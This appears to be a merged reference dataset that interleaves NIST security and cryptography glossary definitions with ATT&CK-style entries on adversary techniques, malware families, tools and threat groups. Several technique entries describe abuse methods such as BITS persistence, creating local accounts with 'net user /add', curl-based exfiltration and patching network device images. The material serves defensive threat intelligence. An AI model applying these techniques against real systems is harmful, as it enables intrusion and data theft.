Definition: A term used to refer to this specific document (i.e., SP 800-133): the “R” is always capitalized.

Name: Web Services
Type: attack-pattern
Description: Adversaries may register for web services that can be used during targeting. A variety of popular websites exist for adversaries to register for a web-based service that can be abused during later stages of the adversary lifecycle, such as during Command and Control (Web Service), Exfiltration Over Web Service, or Phishing. Using common services, such as those offered by Google, GitHub, or Twitter, makes it easier for adversaries to hide in expected noise. By utilizing a web service, adversaries can make it difficult to physically tie back operations to them.

Name: BITS Jobs
Type: attack-pattern
Description: Adversaries may abuse BITS jobs to persistently execute code and perform various background tasks. Windows Background Intelligent Transfer Service (BITS) is a low-bandwidth, asynchronous file transfer mechanism exposed through Component Object Model (COM). BITS is commonly used by updaters, messengers, and other applications preferred to operate in the background (using available idle bandwidth) without interrupting other networked applications. File transfer tasks are implemented as BITS jobs, which contain a queue of one or more file operations.

The interface to create and manage BITS jobs is accessible through PowerShell and the BITSAdmin tool.

Adversaries may abuse BITS to download (e.g. Ingress Tool Transfer), execute, and even clean up after running malicious code (e.g. Indicator Removal). BITS tasks are self-contained in the BITS job database, without new files or registry modifications, and often permitted by host firewalls. BITS enabled execution may also enable persistence by creating long-standing jobs (the default maximum lifetime is 90 days and extendable) or invoking an arbitrary program when a job completes or errors (including after system reboots).

BITS upload functionalities can also be used to perform Exfiltration Over Alternative Protocol.

Term: assessor
Definition: The individual, group, or organization responsible for conducting a security or privacy control assessment.

Term: Distribution
Definition: The transport of a key and other keying material from an entity that either owns, generates or otherwise acquires the key to another entity that is intended to use the key.

Term: FIPS
Definition: A standard for adoption and use by federal departments and agencies that has been developed within the Information Technology Laboratory and published by NIST. A standard in FIPS covers a specific topic in information technology to achieve a common level of quality or some level of interoperability.

Term: Cyber Threat
Definition: Any circumstance or event with the potential to adversely impact organizational operations (a negative risk).

Name: Business Relationships
Type: attack-pattern
Description: Adversaries may gather information about the victim's business relationships that can be used during targeting. Information about an organization’s business relationships may include a variety of details, including second or third-party organizations/domains (ex: managed service providers, contractors, etc.) that have connected (and potentially elevated) network access. This information may also reveal supply chains and shipment paths for the victim’s hardware and software resources.

Adversaries may gather this information in various ways, such as direct elicitation via Phishing for Information. Information about business relationships may also be exposed to adversaries via online or other accessible data sets (ex: Social Media or Search Victim-Owned Websites). Gathering this information may reveal opportunities for other forms of reconnaissance (ex: Phishing for Information or Search Open Websites/Domains), establishing operational resources (ex: Establish Accounts or Compromise Accounts), and/or initial access (ex: Supply Chain Compromise, Drive-by Compromise, or Trusted Relationship).

Term: controlled cryptographic item (CCI) assembly
Definition: A device approved by the National Security Agency (NSA) as a controlled cryptographic item, that embodies a cryptographic logic or other cryptographic design, and performs the entire COMSEC function, but is dependent upon the host equipment to operate.

Term: physical authenticator
Definition: An authenticator that the claimant proves possession of as part of an authentication process.

Term: digital media
Definition: A form of electronic media where data are stored in digital (as opposed to analog) form.

Term: assurance
Definition: The grounds for confidence that an entity meets its security objectives.

Term: ciphertext
Definition: The encrypted form of the plaintext.

Term: RBG seed
Definition: Noun : A string of bits that is used as input to a DRBG mechanism. The seed will determine a portion of the internal state of the DRBG, and its entropy must be sufficient to support the security strength of the DRBG. Verb : To acquire bits with sufficient entropy for the desired security strength. These bits will be used as input to a DRBG mechanism to determine a portion of the initial internal state. Also see reseed.

Term: IPsec
Definition: Provide(s) interoperable, high quality, cryptographically-based security for IPv4 and IPv6. The set of security services offered includes access control, connectionless integrity, data origin authentication, detection and rejection of replays (a form of partial sequence integrity), confidentiality (via encryption), and limited traffic flow confidentiality.&nbsp;

Term: Cipher-based Message Authentication Code
Definition: Cipher-based Message Authentication Code (as specified in NIST SP 800-38B).

Name: Exfiltration Over Alternative Protocol
Type: attack-pattern
Description: Adversaries may steal data by exfiltrating it over a different protocol than that of the existing command and control channel. The data may also be sent to an alternate network location from the main command and control server. 

Alternate protocols include FTP, SMTP, HTTP/S, DNS, SMB, or any other network protocol not being used as the main command and control channel. Adversaries may also opt to encrypt and/or obfuscate these alternate channels. 

Exfiltration Over Alternative Protocol can be done using various common operating system utilities such as Net/SMB or FTP. On macOS and Linux <code>curl</code> may be used to invoke protocols such as HTTP/S or FTP/S to exfiltrate data from a system.

Many IaaS and SaaS platforms (such as Microsoft Exchange, Microsoft SharePoint, GitHub, and AWS S3) support the direct download of files, emails, source code, and other sensitive information via the web console or Cloud API.

Term: Universal Integrated Circuit Card
Definition: An integrated circuit card that securely stores the international mobile subscriber identity (IMSI) and the related cryptographic key used to identify and authenticate subscribers on mobile devices. A UICC may be referred to as a: SIM, USIM, RUIM or CSIM, and is used interchangeably with those terms.

Term: Key expansion
Definition: The second step in the key-derivation procedure specified in this Recommendation in which a key-derivation key is used to derive secret keying material having the desired length.

Term: Trusted Party
Definition: A party that is trusted by an entity to faithfully perform certain services for that entity. An entity may choose to act as a trusted party for itself.

Term: Physical Identifier
Definition: A device identifier that is expressed physically by the device (e.g., printed onto a device’s housing, displayed on a device’s screen).

Term: DSA
Definition: A public-key algorithm that is used for the generation and verification of digital signatures.

Term: Random Bit Generator (RBG)
Definition: A device or algorithm that outputs bits that are computationally indistinguishable from bits that are independent and unbiased.

Name: Brute Ratel C4
Type: tool
Description: Brute Ratel C4 is a commercial red-teaming and adversarial attack simulation tool that first appeared in December 2020. Brute Ratel C4 was specifically designed to avoid detection by endpoint detection and response (EDR) and antivirus (AV) capabilities, and deploys agents called badgers to enable arbitrary command execution for lateral movement, privilege escalation, and persistence. In September 2022, a cracked version of Brute Ratel C4 was leaked in the cybercriminal underground, leading to its use by threat actors.

Name: SampleCheck5000
Type: malware
Description: SampleCheck5000 is a downloader with multiple variants that was used by OilRig including during the Outer Space campaign to download and execute additional payloads.

Term: measurement
Definition: The process of obtaining quantitative values using quantitative methods.

Term: FCKMS functions
Definition: Functions that perform cryptographic key and metadata management operations (see Section 6.4 for examples).

Term: Source authentication
Definition: The process of providing assurance about the source of information. Sometimes called origin authentication. Compare with Entity authentication.

Term: cyber incident
Definition: Any observable occurrence in a network or information system.

Term: Derived PIV Application
Definition: A standardized application residing on a removable hardware cryptographic token that hosts a Derived PIV Credential and associated mandatory and optional elements.

Term: Elliptic Curve Cryptography
Definition: Elliptic curve cryptography.

Term: Information System User
Definition: An FCKMS role that utilizes the key-management services offered by an FCKMS service provider.

Term: Seed Period
Definition: The period of time between instantiating or reseeding a DRBG with one seed and reseeding that DRBG with another seed.

Name: ObliqueRAT
Type: malware
Description: ObliqueRAT is a remote access trojan, similar to Crimson, that has been in use by Transparent Tribe since at least 2020.

Term: Eavesdropper
Definition: A party that secretly receives communications intended for others.

Term: Online Certificate Status Protocol (OCSP)
Definition: An online protocol used to determine the status of a public key certificate.

Name: Azorult
Type: malware
Description: Azorult is a commercial Trojan that is used to steal information from compromised hosts. Azorult has been observed in the wild as early as 2016.
In July 2018, Azorult was seen used in a spearphishing campaign against targets in North America. Azorult has been seen used for cryptocurrency theft.

Term: SCAP component
Definition: One of the eleven specifications that comprise SCAP: Asset Identification, ARF, CCE, CCSS, CPE, CVE, CVSS, OCIL, OVAL, TMSAD, and XCCDF.

Term: Bitstring
Definition: A bitstring is an ordered sequence of 0’s and 1’s.

Term: SLA
Definition: Represents a commitment between a service provider and one or more customers and addresses specific aspects of the service, such as responsibilities, details on the type of service, expected performance level (e.g., reliability, acceptable quality, and response times), and requirements for reporting, resolution, and termination.

Term: system component
Definition: See system component.

Name: RemoteCMD
Type: malware
Description: RemoteCMD is a custom tool used by APT3 to execute commands on a remote system similar to SysInternal's PSEXEC functionality.

Term: FIPS-validated cryptography
Definition: A cryptographic module validated by the Cryptographic Module Validation Program (CMVP) to meet requirements specified in FIPS Publication 140-2 (as amended). As a prerequisite to CMVP validation, the cryptographic module is required to employ a cryptographic algorithm implementation that has successfully passed validation testing by the Cryptographic Algorithm Validation Program (CAVP). See NSA-Approved Cryptography.

Term: identity verification
Definition: The process or act of confirming that the applicant undergoing identity proofing holds the claimed real-life identity represented by the validated identity attributes and associated evidence. Synonymous with identity verification.

Term: risk analysis
Definition: A systematic examination of risk using disciplined processes, methods, and tools. A risk assessment provides an environment for decision makers to evaluate and prioritize risks continuously and to recommend strategies to remediate or mitigate those risks.

Term: Hardening
Definition: A process intended to eliminate a means of attack by patching vulnerabilities and turning off nonessential services.

Term: Deterministic Random Bit Generator
Definition: A random bit generator that includes a DRBG algorithm and (at least initially) has access to a source of randomness. The DRBG produces a sequence of bits from a secret initial value called a seed, along with other possible inputs. A cryptographic DRBG has the additional property that the output is unpredictable, given that the seed is not known. A DRBG is sometimes also called a Pseudo-random Number Generator (PRNG) or a deterministic random number generator.

Term: security architecture
Definition: Fundamental concepts or properties related to a system in its environment embodied in its elements, relationships, and in the principles of its design and evolution.

Term: system component
Definition: A discrete identifiable information technology asset that represents a building block of a system and may include hardware, software, and firmware.

Name: MuddyWater
Type: intrusion-set
Description: MuddyWater is a cyber espionage group assessed to be a subordinate element within Iran's Ministry of Intelligence and Security (MOIS). Since at least 2017, MuddyWater has targeted a range of government and private organizations across sectors, including telecommunications, local government, finance, defense, and oil and natural gas organizations, in the Middle East (specifically the UAE and Saudi Arabia), Asia, Africa, Europe, and North America. MuddyWater has reused domains dating back to October 2025, and has a preference for NameCheap and Hosterdaddy Private Limited (AS136557). In late 2025 and early 2026, MuddyWater used commercial satellite internet (i.e., Starlink) for command and control (C2) communication.

Term: COTS
Definition: A product that is commercially available.

Term: key
Definition: A parameter used in the block cipher algorithm that determines the forward cipher operation and the inverse cipher operation.

Term: impact level
Definition: The assessed potential impact resulting from a compromise of the confidentiality, integrity, or availability of an information type, expressed as a value of low, moderate, or high.

Term: security assessment
Definition: The testing and/or evaluation of the management, operational, and technical security controls to determine the extent to which the controls are implemented correctly, operating as intended, and producing the desired outcome with respect to meeting the security requirements for an information system or organization.

Term: Forensic Specialist
Definition: Locates, identifies, collects, analyzes and examines data while preserving the integrity and maintaining a strict chain of custody of information discovered.

Name: Customer Relationship Management Software
Type: attack-pattern
Description: Adversaries may leverage Customer Relationship Management (CRM) software to mine valuable information. CRM software is used to assist organizations in tracking and managing customer interactions, as well as storing customer data.

Once adversaries gain access to a victim organization, they may mine CRM software for customer data. This may include personally identifiable information (PII) such as full names, emails, phone numbers, and addresses, as well as additional details such as purchase histories and IT support interactions. By collecting this data, an adversary may be able to send personalized Phishing emails, engage in SIM swapping, or otherwise target the organization’s customers in ways that enable financial gain or the compromise of additional organizations.

CRM software may be hosted on-premises or in the cloud. Information stored in these solutions may vary based on the specific instance or environment. Examples of CRM software include Microsoft Dynamics 365, Salesforce, Zoho, Zendesk, and HubSpot.

Term: RoT
Definition: A starting point that is implicitly trusted.

Term: <em>t</em>
Definition: The octet length of the MAC.

Term: RMF
Definition: A disciplined and structured process that integrates information security and risk management activities into the system development life cycle.

Term: static code analyzer
Definition: A tool that analyzes source code without executing the code. Static code analyzers are designed to review bodies of source code (at the programming language level) or compiled code (at the machine language level) to identify poor coding practices. Static code analyzers provide feedback to developers during the code development phase on security flaws that might be introduced into code.

Name: HyperBro
Type: malware
Description: HyperBro is a custom in-memory backdoor used by Threat Group-3390.

Term: FCKMS Security Policy
Definition: The security policy defined by an FCKMS service provider and the FCKMS service-using organization that specifies how the FCKMS will be operated.

Name: Local Account
Type: attack-pattern
Description: Adversaries may create a local account to maintain access to victim systems. Local accounts are those configured by an organization for use by users, remote support, services, or for administration on a single system or service. 

For example, with a sufficient level of access, the Windows <code>net user /add</code> command can be used to create a local account. In Linux, the `useradd` command can be used, while on macOS systems, the <code>dscl -create</code> command can be used. Local accounts may also be added to network devices, often via common Network Device CLI commands such as <code>username</code>, to ESXi servers via `esxcli system account add`, or to Kubernetes clusters using the `kubectl` utility.

Adversaries may also create new local accounts on network firewall management consoles – for example, by exploiting a vulnerable firewall management system, threat actors may be able to establish super-admin accounts that could be used to modify firewall rules and gain further access to the network.

Such accounts may be used to establish secondary credentialed access that do not require persistent remote access tools to be deployed on the system.

Term: memorized secret
Definition: A type of authenticator comprised of a character string intended to be memorized or memorable by the subscriber, permitting the subscriber to demonstrate something they know as part of an authentication process.

Term: Attribute Value
Definition: A complete statement that asserts an identity attribute of a subscriber, independent of format. For example, for the attribute “birthday,” a value could be “12/1/1980” or “December 1, 1980.”

Term: Overlay network
Definition: A software-defined networking component included in most orchestrators that can be used to isolate communication between applications that share the same physical network.

Term: threat monitoring
Definition: Analysis, assessment, and review of audit trails and other information collected for the purpose of searching out system events that may constitute violations of system security.

Term: ongoing assessment and authorization
Definition: See information security continuous monitoring (ISCM).

Term: SSP
Definition: Formal document that provides an overview of the security requirements for the information system and describes the security controls in place or planned for meeting those requirements.

Term: Security Automation Domain
Definition: An information security area that includes a grouping of tools, technologies, and data.

Term: <em>D</em>
Definition: A payload of data that is assembled and transmitted by the message signatory, which includes (at least) the message and a digital signature, and may also include one or more timestamps.

Term: incident response
Definition: See incident handling.

Term: Instantiation of an RBG
Definition: An instantiation of an RBG is a specific, logically independent, initialized RBG. One instantiation is distinguished from another by a “handle” (e.g., an identifying number).

Term: <em>q</em>
Definition: Second prime factor of the RSA modulus n.

Term: SAOP
Definition: The senior official designated by the head of each agency who has agency-wide responsibility for privacy, including implementing privacy protections; ensuring compliance with federal laws, regulations, and policies related to privacy; managing privacy risks at the agency; and filling a central policy-making role in the agency’s development and evaluation of legislative, regulatory, and other policy proposals.

Term: SAISO
Definition: Official responsible for carrying out the Chief Information Officer responsibilities under FISMA and serving as the Chief Information Officer’s primary liaison to the agency’s authorizing officials, information system owners, and information system security officers.

Name: Bumblebee
Type: malware
Description: Bumblebee is a custom loader written in C++ that has been used by multiple threat actors, including possible initial access brokers, to download and execute additional payloads since at least March 2022. Bumblebee has been linked to ransomware operations including Conti, Quantum, and Mountlocker and derived its name from the appearance of "bumblebee" in the user-agent.

Term: Simple Mail Transfer Protocol (SMTP)
Definition: the primary protocol used to transfer electronic mail messages on the Internet.

Term: key
Definition: A parameter used with a cryptographic algorithm that determines its operation in such a way that an entity with knowledge of the key can reproduce or reverse the operation, while an entity without knowledge of the key cannot. Examples applicable to this Recommendation include:
1. The computation of a keyed-hash message authentication code.
2. The verification of a keyed-hash message authentication code.
3. The generation of a digital signature on a message.
4. The verification of a digital signature.

Name: Fox Kitten
Type: intrusion-set
Description: Fox Kitten is threat actor with a suspected nexus to the Iranian government that has been active since at least 2017 against entities in the Middle East, North Africa, Europe, Australia, and North America. Fox Kitten has targeted multiple industrial verticals including oil and gas, technology, government, defense, healthcare, manufacturing, and engineering.

Name: Black Basta
Type: malware
Description: Black Basta is ransomware written in C++ that has been offered within the ransomware-as-a-service (RaaS) model since at least April 2022; there are variants that target Windows and VMWare ESXi servers. Black Basta operations have included the double extortion technique where in addition to demanding ransom for decrypting the files of targeted organizations the cyber actors also threaten to post sensitive information to a leak site if the ransom is not paid. Black Basta affiliates have targeted multiple high-value organizations, with the largest number of victims based in the U.S. Based on similarities in TTPs, leak sites, payment sites, and negotiation tactics, security researchers assess the Black Basta RaaS operators could include current or former members of the Conti group.

Term: LND
Definition: a log of last numbers dialed, similar to that kept on the phone, but kept on the SIM without a timestamp.

Term: Final Checklist
Definition: A checklist that has completed public review, has had all issues addressed by the checklist developer and NIST, and has been approved by NIST for listing on the repository.

Term: Internet Protocol Security
Definition: An OSI Network layer security protocol that provides authentication and encryption over IP networks.

Term: federal agency
Definition: An executive department specified in 5 United States Code (U.S.C.), Sec. 101; a military department specified in 5 U.S.C., Sec. 102; an independent establishment as defined in 5 U.S.C., Sec. 104(1); and a wholly owned government corporation fully subject to the provisions of 31 U.S.C., Chapter 91.

Term: Elliptic Curve Digital Signature Algorithm
Definition: Elliptic Curve Digital Signature Algorithm specified in ANSI X9.62 and approved in FIPS 186.

Name: Pass-The-Hash Toolkit
Type: tool
Description: Pass-The-Hash Toolkit is a toolkit that allows an adversary to "pass" a password hash (without knowing the original password) to log in to systems.

Term: Specification Limit
Definition: A condition indicating that risk has exceeded acceptable levels and that immediate action is needed to reduce the risk, or the system/assessment object may need to be removed from production (lose authority to operate).

Term: Path Validation
Definition: The process of verifying the binding between the subject identifier and subject public key in a certificate, based on the public key of a trust anchor, through the validation of a chain of certificates that begins with a certificate issued by the trust anchor and ends with the target certificate. Successful path validation provides strong evidence that the information in the target certificate is trustworthy.

Term: authenticate
Definition: The process of establishing confidence in the identity of users or information systems.

Term: KTS-OAEP-Party_V-confirmation
Definition: Key-transport Scheme with Optimal Asymmetric Encryption Padding and key confirmation provided by party V. Previously known as KTS-OAEP-receiver-confirmation.

Name: Indirect Command Execution
Type: attack-pattern
Description: Adversaries may abuse utilities that allow for command execution to bypass security restrictions that limit the use of command-line interpreters. Various Windows utilities may be used to execute commands, possibly without invoking cmd. For example, Forfiles, the Program Compatibility Assistant (`pcalua.exe`), components of the Windows Subsystem for Linux (WSL), `Scriptrunner.exe`, as well as other utilities may invoke the execution of programs and commands from a Command and Scripting Interpreter, Run window, or via scripts. Adversaries may also abuse the `ssh.exe` binary to execute malicious commands via the `ProxyCommand` and `LocalCommand` options, which can be invoked via the `-o` flag or by modifying the SSH config file.

Adversaries may abuse these features for Stealth, specifically to perform arbitrary execution while subverting detections and/or mitigation controls (such as Group Policy) that limit/prevent the usage of cmd or file extensions more commonly associated with malicious payloads.

Name: PcShare
Type: tool
Description: PcShare is an open source remote access tool that has been modified and used by Chinese threat actors, most notably during the FunnyDream campaign since late 2018.

Term: common secure configuration
Definition: A recognized standardized and established benchmark (e.g., National Checklist Program, DISA STIGs, CIS Benchmarks, etc.) that stipulates specific secure configuration settings for a given IT platform.

Term: Conformance Testing
Definition: A process established by NIST within its responsibilities of developing, promulgating, and supporting a FIPS for testing specific characteristics of components, products, services, people, and organizations for compliance with the FIPS.

Term: Archive facility
Definition: 2. A location or media used for long-term storage.

Term: semi-supervised learning
Definition: A type of machine learning in which a small number of training samples are labeled, while the majority are unlabeled.

Term: High-Value Asset
Definition: Those information resources, mission/business processes, and/or critical programs that are of particular interest to potential or actual adversaries.

Term: SC
Definition: The process of determining the security category for information or an information system. Security categorization methodologies are described in CNSS Instruction 1253 for national security systems and in FIPS 199 for other than national security systems.

Term: SC 37
Definition: The Biometrics standardization subcommittee under ISO/IEC Joint Technical Committee

Name: Browser Session Hijacking
Type: attack-pattern
Description: Adversaries may take advantage of security vulnerabilities and inherent functionality in browser software to change content, modify user-behaviors, and intercept information as part of various browser session hijacking techniques.

A specific example is when an adversary injects software into a browser that allows them to inherit cookies, HTTP sessions, and SSL client certificates of a user then use the browser as a way to pivot into an authenticated intranet. Executing browser-based behaviors such as pivoting may require specific process permissions, such as <code>SeDebugPrivilege</code> and/or high-integrity/administrator rights.

Another example involves pivoting browser traffic from the adversary's browser through the user's browser by setting up a proxy which will redirect web traffic. This does not alter the user's traffic in any way, and the proxy connection can be severed as soon as the browser is closed. The adversary assumes the security context of whichever browser process the proxy is injected into. Browsers typically create a new process for each tab that is opened and permissions and certificates are separated accordingly. With these permissions, an adversary could potentially browse to any resource on an intranet, such as Sharepoint or webmail, that is accessible through the browser and which the browser has sufficient permissions. Browser pivoting may also bypass security provided by 2-factor authentication.

Name: GoldFinder
Type: malware
Description: GoldFinder is a custom HTTP tracer tool written in Go that logs the route a packet takes between a compromised network and a C2 server. It can be used to inform threat actors of potential points of discovery or logging of their actions, including C2 related to other malware. GoldFinder was discovered in early 2021 during an investigation into the SolarWinds Compromise by APT29.

Name: Zeroaccess
Type: malware
Description: Zeroaccess is a kernel-mode Rootkit that attempts to add victims to the ZeroAccess botnet, often for monetary gain.

Term: Worldwide Interoperability for Microwave Access
Definition: A wireless metropolitan area network (WMAN) technology based on the IEEE 802.16 family of standards used for a variety of purposes, including, but not limited to, fixed last-mile broadband access, long-range wireless backhaul, and access layer technology for mobile wireless subscribers operating on telecommunications networks.

Term: On-demand self-service
Definition: A consumer can unilaterally provision computing capabilities, such as server time and network storage, as needed automatically without requiring human interaction with each service provider.

Term: configuration management
Definition: A management process for establishing and maintaining consistency of a product's performance, functional, and physical attributes with its requirements, design and operational information throughout its life.

Term: assurance
Definition: See Assurance.

Term: Key-derivation key
Definition: A key used with a key-derivation function or method to derive additional keys. Also called a master key.

Name: KARAE
Type: malware
Description: KARAE is a backdoor typically used by APT37 as first-stage malware.

Term: risk analysis
Definition: The process of identifying risks to organizational operations
(including mission, functions, image, reputation), organizational
assets, individuals, other organizations, and the Nation, resulting
from the operation of an information system. Part of risk
management, incorporates threat and vulnerability analyses,
and considers mitigations provided by security controls planned
or in place.

Term: Variable-value configuration coverage
Definition: For a given combination of t variables, variable-value configuration coverage is the proportion of variable-value configurations that are covered by at least one test case in a test set.

Term: token
Definition: Something the claimant possesses and controls (typically a cryptographic module or password) that is used to authenticate the claimant’s identity. This was previously referred to as a token.

Term: Requester
Definition: An active entity, generally in the form of a person, process, or device, that causes information to flow among objects or changes the system state.

Term: re-identification risk
Definition: the risk that de-identified records can be re-identified. Re-identification risk is typically reported as the percentage of records in a dataset that can be re-identified.

Term: certificate revocation list (CRL)
Definition: A list of revoked but unexpired certificates issued by a Certification Authority.

Term: zeroization
Definition: A method of erasing electronically stored data, cryptographic keys, and credentials service providers (CSPs) by altering or deleting the contents of the data storage to prevent recovery of the data.

Term: OT
Definition: Hardware and software that detects or causes a change through the direct monitoring and/or control of physical devices, processes and events in the enterprise.

Name: Ecipekac
Type: malware
Description: Ecipekac is a multi-layer loader that has been used by menuPass since at least 2019 including use as a loader for P8RAT, SodaMaster, and FYAnti.

Term: COMSEC custodian
Definition: Individual designated by proper authority to be responsible for the receipt, transfer, accounting, safeguarding, and destruction of COMSEC material assigned to a COMSEC account. 
Rationale: Term has been replaced by the term “COMSEC account manager”.

Term: supply chain element
Definition: An information technology product or product component that contains programmable logic and that is critically important to the functioning of an information system.

Name: Babuk
Type: malware
Description: Babuk is a Ransomware-as-a-service (RaaS) malware that has been used since at least 2021. The operators of Babuk employ a "Big Game Hunting" approach to targeting major enterprises and operate a leak site to post stolen data as part of their extortion scheme.

Name: Gold Dragon
Type: malware
Description: Gold Dragon is a Korean-language, data gathering implant that was first observed in the wild in South Korea in July 2017. Gold Dragon was used along with Brave Prince and RunningRAT in operations targeting organizations associated with the 2018 Pyeongchang Winter Olympics.

Term: Key-derivation key
Definition: A key used as an input to a key-derivation method to derive additional keying material.

Name: ChChes
Type: malware
Description: ChChes is a Trojan that appears to be used exclusively by menuPass. It was used to target Japanese organizations in 2016. Its lack of persistence methods suggests it may be intended as a first-stage tool.

Term: party
Definition: An item inside or outside an information and communication technology system, such as a person, an organization, a device, a subsystem, or a group of such items that has recognizably distinct existence.

Term: Trusted Third Party
Definition: A third party, such as a CA, that is trusted by its clients to perform certain services. (By contrast, for example, the sender and receiver in a scheme are considered to be the first and second parties in a key-establishment transaction).

Term: Signed data
Definition: The data or message upon which a digital signature has been computed.

Term: Fresh
Definition: For a newly generated key, the property of being unequal to any previously used key.

Term: access control
Definition: Restricts access to resources only to privileged entities.

Term: Capacity Planning
Definition: Systematic determination of resource requirements for the projected output, over a specific period.

Term: availability
Definition: The property that data or information is accessible and usable upon demand by an authorized person.

Term: incident response
Definition: The mitigation of violations of security policies and recommended practices.

Name: Encrypted/Encoded File
Type: attack-pattern
Description: Adversaries may encrypt or encode files to obfuscate strings, bytes, and other specific patterns to impede detection. Encrypting and/or encoding file content aims to conceal malicious artifacts within a file used in an intrusion. Many other techniques, such as Software Packing, Steganography, and Embedded Payloads, share this same broad objective. Encrypting and/or encoding files could lead to a lapse in detection of static signatures, only for this malicious content to be revealed (i.e., Deobfuscate/Decode Files or Information) at the time of execution/use.

This type of file obfuscation can be applied to many file artifacts present on victim hosts, such as malware log/configuration and payload files. Files can be encrypted with a hardcoded or user-supplied key, as well as otherwise obfuscated using standard encoding schemes such as Base64.

The entire content of a file may be obfuscated, or just specific functions or values (such as C2 addresses). Encryption and encoding may also be applied in redundant layers for additional protection.

For example, adversaries may abuse password-protected Word documents or self-extracting (SFX) archives as a method of encrypting/encoding a file such as a Phishing payload. These files typically function by attaching the intended archived content to a decompressor stub that is executed when the file is invoked (e.g., User Execution). 

Adversaries may also abuse file-specific as well as custom encoding schemes. For example, Byte Order Mark (BOM) headers in text files may be abused to manipulate and obfuscate file content until Command and Scripting Interpreter execution.

Term: <em>rv_length_indicator</em>
Definition: A 16-bit binary representation of the length (in bits) of rv.

Term: Preimage
Definition: A message X that produces a given message digest when it is processed by a hash function.

Term: Key-derivation procedure
Definition: As used in this Recommendation, a two-step key-derivation method consisting of randomness extraction followed by key expansion.

Term: assessment results
Definition: The output or outcome of an assessment.

Term: acquirer
Definition: Stakeholder that acquires or procures a product or service from a supplier.

Name: Net
Type: tool
Description: The Net utility is a component of the Windows operating system. It is used in command-line operations for control of users, groups, services, and network connections. 

Net has a great deal of functionality, much of which is useful for an adversary, such as gathering system and network information for Discovery, moving laterally through SMB/Windows Admin Shares using <code>net use</code> commands, and interacting with services. The net1.exe utility is executed for certain functionality when net.exe is run and can be used directly in commands such as <code>net1 user</code>.

Term: Adversarial Machine Learning
Definition: Attacks that exploit the statistical, data-based nature of ma­chine learning systems.

Name: KGH_SPY
Type: malware
Description: KGH_SPY is a modular suite of tools used by Kimsuky for reconnaissance, information stealing, and backdoor capabilities. KGH_SPY derived its name from PDB paths and internal names found in samples containing "KGH".

Term: CRC
Definition: A method to ensure data has not been altered after being sent through a communication channel.

Term: AA
Definition: An entity, recognized by the Federal PKI Policy Authority or comparable Agency body as having the authority to verify the association of attributes to an identity.

Term: cryptanalytically relevant quantum computer
Definition: A device capable of using quantum algorithms to break a cryptosystem that is secure against classical (i.e., non-quantum) computers.

Term: CKMS vendor
Definition: The entity that markets the CKMS to CKMS service providers.

Name: Patch System Image
Type: attack-pattern
Description: Adversaries may modify the operating system of a network device to introduce new capabilities or weaken existing defenses. Some network devices are built with a monolithic architecture, where the entire operating system and most of the functionality of the device is contained within a single file. Adversaries may change this file in storage, to be loaded in a future boot, or in memory during runtime.

To change the operating system in storage, the adversary will typically use the standard procedures available to device operators. This may involve downloading a new file via typical protocols used on network devices, such as TFTP, FTP, SCP, or a console connection. The original file may be overwritten, or a new file may be written alongside of it and the device reconfigured to boot to the compromised image.

To change the operating system in memory, the adversary typically can use one of two methods. In the first, the adversary would make use of native debug commands in the original, unaltered running operating system that allow them to directly modify the relevant memory addresses containing the running operating system. This method typically requires administrative level access to the device.

In the second method for changing the operating system in memory, the adversary would make use of the boot loader. The boot loader is the first piece of software that loads when the device starts that, in turn, will launch the operating system. Adversaries may use malicious code previously implanted in the boot loader, such as through the ROMMONkit method, to directly manipulate running operating system code in memory. This malicious code in the bootloader provides the capability of direct memory manipulation to the adversary, allowing them to patch the live operating system during runtime.

By modifying the instructions stored in the system image file, adversaries may either weaken existing defenses or provision new capabilities that the device did not have before. Examples of existing defenses that can be impeded include encryption, via Weaken Encryption, authentication, via Network Device Authentication, and perimeter defenses, via Network Boundary Bridging. Adding new capabilities for the adversary’s purpose include Keylogging, Multi-hop Proxy, and Port Knocking.

Adversaries may also compromise existing commands in the operating system to produce false output to mislead defenders. When this method is used in conjunction with Downgrade System Image, one example of a compromised system command may include changing the output of the command that shows the version of the currently running operating system. By patching the operating system, the adversary can change this command to instead display the original, higher revision number that they replaced through the system downgrade. 

When the operating system is patched in storage, this can be achieved in either the resident storage (typically a form of flash memory, which is non-volatile) or via TFTP Boot. 

When the technique is performed on the running operating system in memory and not on the stored copy, this technique will not survive across reboots. However, live memory modification of the operating system can be combined with ROMMONkit to achieve persistence.

Term: Permissionless
Definition: A system where all users’ permissions are equal and not set by any administrator or consortium.

Term: Basis vector
Definition: A vector consisting of a ―1‖ in the ithposition and ―0‖ in all of the other positions.

Term: CRL
Definition: A list maintained by a Certification Authority of the certificates which it has issued that are revoked prior to their stated expiration date.

Term: OLIR Template
Definition: A spreadsheet that contains the fields necessary for creating a well-formed OLIR for submission to the OLIR Program. It serves as the starting point for the Developer.

Term: Secure Sockets Layer (SSL)
Definition: An authentication and security protocol that is widely implemented in browsers and web servers. TLS provides confidentiality, certificate-based authentication of the receiving (server) endpoint, and certificate-based authentication of the originating (client) endpoint. TLS is specified in [RFC8446] and [SP800-52].

Term: FIPPs
Definition: Principles that are widely accepted in the United States and internationally as a general framework for privacy and that are reflected in various federal and international laws and policies. In a number of organizations, the principles serve as the basis for analyzing privacy risks and determining appropriate mitigation strategies.

Term: malware
Definition: See “Malware.”

Term: SAOP
Definition: Person responsible for ensuring that an agency complies with privacy requirements, manages privacy risks, and considers the privacy impacts of all agency actions and policies that involve personal information.

Term: encapsulation key
Definition: A cryptographic key produced by a KEM during key generation and used during the encapsulation process. The encapsulation key can be made public.

Term: Packet Filter
Definition: Specifies which types of traffic should be permitted or denied and how permitted traffic should be protected, if at all.

Term: Recommendation
Definition: A special publication of the ITL stipulating specific characteristics of technology to use or procedures to follow to achieve a common level of quality or level of interoperability.

Name: Calisto
Type: malware
Description: Calisto is a macOS Trojan that opens a backdoor on the compromised machine. Calisto is believed to have first been developed in 2016.

Term: cryptographic key
Definition: A parameter used in conjunction with a cryptographic algorithm that determines its operation in such a way that an entity with knowledge of the correct key can reproduce or reverse the operation, while an entity without knowledge of the key cannot. Examples of cryptographic operations requiring the use of cryptographic keys include:
1. The transformation of plaintext data into ciphertext data,
2. The transformation of ciphertext data into plaintext data,
3. The computation of a digital signature from data,
4. The verification of a digital signature,
5. The computation of a message authentication code (MAC) from data,
6. The verification of a MAC from data and a received MAC,
7. The computation of a shared secret that is used to derive keying material, and
8. The derivation of additional keying material from a keyderivation key (e.g., a pre-shared key).
The specification of a cryptographic algorithm (as employed in a particular application) typically declares which of its parameters are keys.

Term: RBG seed
Definition: The input to a pseudorandom number generator. Different seeds generate different pseudorandom sequences.

Term: access control
